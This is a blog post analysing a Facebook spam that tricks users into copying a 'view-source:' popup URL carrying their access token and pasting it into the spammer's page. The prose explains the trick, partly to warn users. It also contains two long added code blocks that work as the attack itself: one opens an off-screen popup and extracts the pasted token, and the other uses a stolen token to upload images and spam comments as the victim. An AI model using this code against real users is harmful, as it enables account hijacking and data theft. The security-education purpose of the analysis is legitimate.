This post is about a new social engineering spam that is spreading virally on Facebook. I have recorded a video on how users fall prey to it. Click here to go directly to the video.
Nothing beats exploiting the weakest link on the web: the user. If a web user can be tricked into performing a few actions with the mouse or keyboard, a clever spammer can achieve almost anything. This is social engineering, and it has few defenses beyond educating users about the tricks spammers use, which is the goal of this post. [Related post: Analyzing the Rihanna Facebook spam]
The picture on the left has become quite popular on Facebook these days. Of course, it spreads through spam: the spam tags all the friends of an infected user in the picture, comments on the user's behalf, steals the user's information, and more. The message it displays raises so much curiosity that users will do almost anything to watch it. Clicking on the picture takes the user to a different domain (outside Facebook) and asks the user to perform a series of actions. Once a user is logged into Facebook (or any other website) and can be induced to interact with an attacker's page in another tab, all bets are off. Since the target audience for this post includes non-technical Facebook users as well as techies, I have split the post accordingly.
For Non-Technical Facebook Users:
I have recorded a video on how this spam spreads. If you use Chrome as your browser, you will see the steps shown in the video below. If you use Firefox, you will see a different sequence of steps; Firefox users, check this video instead.
After watching these clips, make sure you do not fall for such traps on any website. Facebook uses "access tokens": an access token identifies you to Facebook for a certain duration, and whoever holds it can act as you until it expires. By following the steps in the spam image, you are simply handing your access token to the spammer. The spammer's code can then post on Facebook on your behalf, steal your contact information and friend list, and keep spamming, including by email. In fact, spammers sell this stolen information to advertisers and make money out of end users' ignorance.
To steal users' access tokens, spammers lure them into performing certain actions (clicks, key presses, etc.). Some previous spams (e.g., the Rihanna Facebook spam) used Flash to copy a malicious script to the clipboard automatically and lured users into pasting it into the address bar of a Facebook page. This amounts to having users inject the bad script into the Facebook page themselves. It no longer works in newer browsers, so spammers chose the converse of the technique: lure users into a "copy" action (Ctrl+C) somewhere on a Facebook page and then a "paste" action (Ctrl+V) on the spammer's site. By doing this, users hand their access tokens to the spammer's code. Once spammers have the token, they can perform any action on Facebook on behalf of the user until it expires. At a high level, this is what happens in this spam. The general techniques spammers use to aid their mission are loopholes in cross-origin interactions and clickjacking, apart from several other browser hacks.
Though the stealing technique is not new and didn't surprise me, what amused me was the level of effort the spammer put into stealing content. For sure, our guy is a very good web developer who chose to make a quick buck. Unlike other spammers, this guy is not lazy and worked around all the hurdles (read: inconsistent browser support for new features) to get things done. For instance, these are the libraries the spammer used in his code.
- Deck.js for those smooth transitions between pages (I first thought he had used Flash, since Flash has clipboard access, which would save the user one step). By the way, this is way better than http://slides.html5rocks.com/ for online presentations. Good one! :-)
- Modernizr for HTML5 feature detection
- jQuery backstretch for adding a dynamically-resized background image to the page.
- jQuery cookie - a jQuery plugin for reading, writing, deleting cookies
- Blob.js for implementing W3C's Blob interface in non-supporting browsers
- Canvas to blob for converting canvas elements into blob objects
- URI.js for simplifying working with URIs.
Why was it complex to analyze?
Thankfully, there are a couple of online tools which made my task easier.
As shown in the videos above, the code behaves differently in different browsers, so some user-agent sniffing must be happening. After spending a lot of time, I found that the script files being served vary with the user agent (thanks to diffnow.com for the quick comparison).
Why different tricks in different browsers?
Okay, this is the crux of the entire workflow. It took me a while to find out, and though it is subtle, it was a new learning for me as well. The idea is to open a popup window with the "view-source:" scheme, which displays the source code of a web page (this works only in Chrome and Firefox). If "view-source:" is pointed at a Facebook Connect URL, Facebook automatically attaches a valid access token, since the user is already logged into Facebook (much as cookies are attached to subsequent requests once a user is authenticated), and the token ends up in the URL shown in the popup's address bar. Here is how the URL looks, with the access token in it:
Now, if the spammer can get hold of this URL, he can extract the access token and issue requests with it from his own script. Getting the URL out of the popup requires different behaviour in different browsers.
- In Internet Explorer, the "view-source" scheme is not supported, so the spammer shows a fake captcha and asks the user to enter a verification code, using clickjacking to make the user submit his input. I tried in all versions of IE (7 to 10), but could not get the code working. He messed up his CSS, so the positioning went wrong. Probably IE was not his target.
- In Firefox, the code opens the popup with the "view-source" scheme and asks the user to press three keys in sequence: "Ctrl+L", "Ctrl+C", "Ctrl+W". Anyone who uses keyboard shortcuts regularly can see what this means. "Ctrl+L" moves focus to the popup's address bar and selects the entire text. "Ctrl+C" copies it. "Ctrl+W" closes the popup window. However, the large values for the "top" and "left" attributes put the popup behind the active browser window while it still retains keyboard focus. This popup behaviour is unique to Firefox, so Firefox users see nothing suspicious. On pressing "Ctrl+V" on the spammer's page, the user's access token is pasted into the spammer's web page, and the token is handed over.
- In Chrome, the view-source scheme works, but the popup behaves differently. Popups appear above the active window, so the spammer has no choice but to ask the user to right-click and copy the URL, as shown in the pic to the right.
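The two halves of the Firefox/Chrome flow above, as an added example written for this post (it is not the spammer's code): the off-screen "view-source:" popup on the attacker's side, and the paste handler that turns the copied address bar into a usable token. Assumptions not in the original: the exact Connect URL and the shape of the redirect it lands on (a login_success.html page with access_token and expires_in in the URL fragment), the placeholder APP_ID, and the id "paste-here" of the field the victim pastes into.

```javascript
// Added example, not the spammer's code. Reconstructs the popup + paste
// token theft described in the post. Assumed (not taken from the post):
// CONNECT_URL, APP_ID, the redirect URL shape, and the "paste-here" field id.

// A Connect/OAuth URL that, for a logged-in user, redirects to a success
// page carrying the token in the URL fragment. APP_ID is a placeholder.
const APP_ID = 'APP_ID_PLACEHOLDER';
const CONNECT_URL =
  'https://www.facebook.com/dialog/oauth?client_id=' + APP_ID +
  '&redirect_uri=https://www.facebook.com/connect/login_success.html' +
  '&response_type=token';

// Firefox variant: open view-source: on the Connect URL in a popup placed
// far off-screen. It keeps keyboard focus, so the victim's Ctrl+L, Ctrl+C,
// Ctrl+W act on the popup's address bar without the popup being seen.
// Browser-only; not called at top level so the file also loads under Node.
function openHiddenViewSourcePopup(url) {
  return window.open('view-source:' + url, 'fbsrc',
    'width=1,height=1,top=9999,left=9999');
}

// What the attacker's page does with the pasted text: strip the
// view-source: scheme, confirm it is the expected redirect target, and pull
// the token out of the fragment. Returns null for anything else, so random
// pastes (or a defender feeding it junk) yield nothing.
function extractAccessToken(pasted) {
  const text = String(pasted).trim().replace(/^view-source:/i, '');
  let url;
  try {
    url = new URL(text);
  } catch (e) {
    return null;
  }
  if (url.hostname !== 'www.facebook.com' ||
      url.pathname !== '/connect/login_success.html') {
    return null;
  }
  // The implicit OAuth flow puts the token after "#", not in the query.
  const params = new URLSearchParams(url.hash.replace(/^#/, ''));
  const token = params.get('access_token');
  if (!token) return null;
  return { token: token, expiresIn: Number(params.get('expires_in') || 0) };
}

// Wire the paste handler only when running inside a browser page.
if (typeof document !== 'undefined') {
  const field = document.getElementById('paste-here'); // assumed element id
  if (field) {
    field.addEventListener('paste', function (ev) {
      const found = extractAccessToken(ev.clipboardData.getData('text'));
      if (found) {
        // From here on the token is the attacker's: any Graph API call made
        // with it runs as the victim until expiresIn seconds have elapsed.
        console.log('token captured, expires in', found.expiresIn, 's');
      }
    });
  }
}
```

The Chrome variant uses the same opener; only the copy step changes, because the visible popup forces the spammer to ask for a right-click on the address bar instead of the three-key sequence. Note that extractAccessToken never needs the page itself to talk to Facebook: the victim's own browser fetched the URL with the victim's session, and the clipboard carried the result across origins.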
Using these simple tricks, spammers steal access tokens. Not 100% convincing to a decent techie, but they have proven popular among the masses. I won't be surprised if I come across newer spams that use "fake captcha" techniques like those shown by Kotowicz.
What is the motive behind the spam?
Well, data is the currency of the web. After a successful attack, the spammer has complete access to the user's Facebook data, along with the IDs of the user's friends, which he can sell to advertisers. I tried digging through the network calls to see whether he exports data to any other site or endorses a specific vendor. All I found is that he is associated with a Brazilian site called "Mobile Xpert" (https://mobilexpert.com.br). I found this from a Facebook Graph API call that points to Mobile Xpert's FB page.
Can I have a look at network traffic, without running the code?
Sure, I have exported the HTTP calls made by the spammer's page to a HAR (HTTP Archive) file. You can get it from the GitHub repo (careful, large file). To view it properly, open the file, copy its content, navigate to http://www.softwareishard.com/har/viewer/ (an online HAR viewer), paste the content into the textbox, uncheck the "Validate data before processing?" checkbox and hit "preview". You can then view it much like Firefox's network panel and analyze the traffic yourself. Check the FB Graph API calls to see all the havoc that is happening (the call GET 244767798982043 is made to Mobile Xpert's FB page).
How did the spam tag user's friends in the pic?
As said earlier, once the spammer's code has the access token, it can do anything: tag friends, comment on the photo on the user's behalf, steal user info, and so on. You can see all of this happening in the network traffic shown above. Getting the spam image into the user's photos without a file chooser works like this:
- First, he loaded an image using <img src=""> from his server.
- Then he used HTML5 canvas and drew the image on the canvas using JS (Basic canvas example)
- Then he converted the canvas to blob using JS
- Then he used FormData of XHR2 specification to upload the blob via AJAX post!
I am not sure if this is a well-known technique, but at least for me, this is a clever way of doing automated uploads. It remains to be seen how many misuses are already in the wild!
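The four-step upload chain above (img, canvas, blob, FormData), as an added example written for this post rather than the spammer's code. Assumed: the image is served from the same origin as the page (otherwise the canvas is "tainted" and toBlob() refuses), the token came from the paste step earlier, and the upload goes to the Graph API photo endpoint with a multipart "source" file and a "message" text field; the endpoint and field names are assumptions, as is the list of comment URLs, which stands in for the real urls-jack.js list.

```javascript
// Added example, not the spammer's code. Reconstructs the img -> canvas ->
// blob -> FormData upload described in the post. Assumed: same-origin image,
// the Graph API endpoint/field names, and the sample COMMENT_URLS below.

// Stand-in for the spammer's list of randomised URLs (constructed sample).
const COMMENT_URLS = [
  'https://a1b2c3.example.net/video',
  'https://d4e5f6.example.org/video',
  'https://g7h8i9.example.com/video',
];

// Step 1: load the image as an ordinary <img>. Must be same-origin or served
// with CORS headers; otherwise drawImage() taints the canvas and
// toBlob() throws a SecurityError instead of exporting pixels.
function loadImage(src) {
  return new Promise(function (resolve, reject) {
    const img = new Image();
    img.onload = function () { resolve(img); };
    img.onerror = function () { reject(new Error('image failed to load: ' + src)); };
    img.src = src;
  });
}

// Steps 2-3: draw onto a canvas and export the pixels as a Blob. toBlob is
// the native path; older browsers needed the Blob.js / canvas-to-blob
// polyfills the post lists.
function imageToBlob(img, type) {
  return new Promise(function (resolve, reject) {
    const canvas = document.createElement('canvas');
    canvas.width = img.naturalWidth;
    canvas.height = img.naturalHeight;
    canvas.getContext('2d').drawImage(img, 0, 0);
    canvas.toBlob(function (blob) {
      if (blob) resolve(blob); else reject(new Error('toBlob failed'));
    }, type || 'image/jpeg');
  });
}

// Pick one comment URL per upload. The index is injectable so the choice is
// deterministic in tests; the real code would use Math.random().
function pickCommentUrl(urls, pick) {
  const i = (pick === undefined) ? Math.floor(Math.random() * urls.length) : pick;
  return urls[((i % urls.length) + urls.length) % urls.length];
}

// Step 4: XHR2 FormData carries the Blob exactly like a user-chosen file, so
// the server sees a normal multipart upload. No file picker, no user action.
function buildPhotoUpload(blob, message, accessToken) {
  const form = new FormData();
  form.append('source', blob, 'photo.jpg');
  form.append('message', message);
  form.append('access_token', accessToken);
  return form;
}

function postForm(url, form) {
  return new Promise(function (resolve, reject) {
    const xhr = new XMLHttpRequest();
    xhr.open('POST', url);
    xhr.onload = function () { resolve(xhr.responseText); };
    xhr.onerror = function () { reject(new Error('upload failed')); };
    xhr.send(form);
  });
}

// Whole chain, run from the attacker's page with a stolen token.
// Endpoint is an assumption; it is the one the Graph API photo upload used.
async function uploadLaunderedImage(src, accessToken) {
  const img = await loadImage(src);
  const blob = await imageToBlob(img);
  const form = buildPhotoUpload(blob, pickCommentUrl(COMMENT_URLS), accessToken);
  return postForm('https://graph.facebook.com/me/photos', form);
}
```

Because the request originates from the victim's browser with the victim's token, Facebook sees a photo uploaded by that user, and each upload carries a different comment URL, which is consistent with the randomised URL list the post describes in urls-jack.js.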
So is that all?
Not yet. Check the file "urls-jack.js" in the GitHub repo. I was surprised to see 495 unique URLs hosting the spammer's code, each with a random string as a prefix and spread across multiple domains. For each image uploaded by the spam code, one of these URLs is chosen at random as the comment. This is probably to escape spam filters!
I am not sure if there are other hidden gimmicks. I wish I had more time to analyze the code. Loved the way the spammer organized his code and his persistent attempts to achieve his goal: stealing users' access tokens. It was fun analyzing this code. I will update the post if I find anything interesting.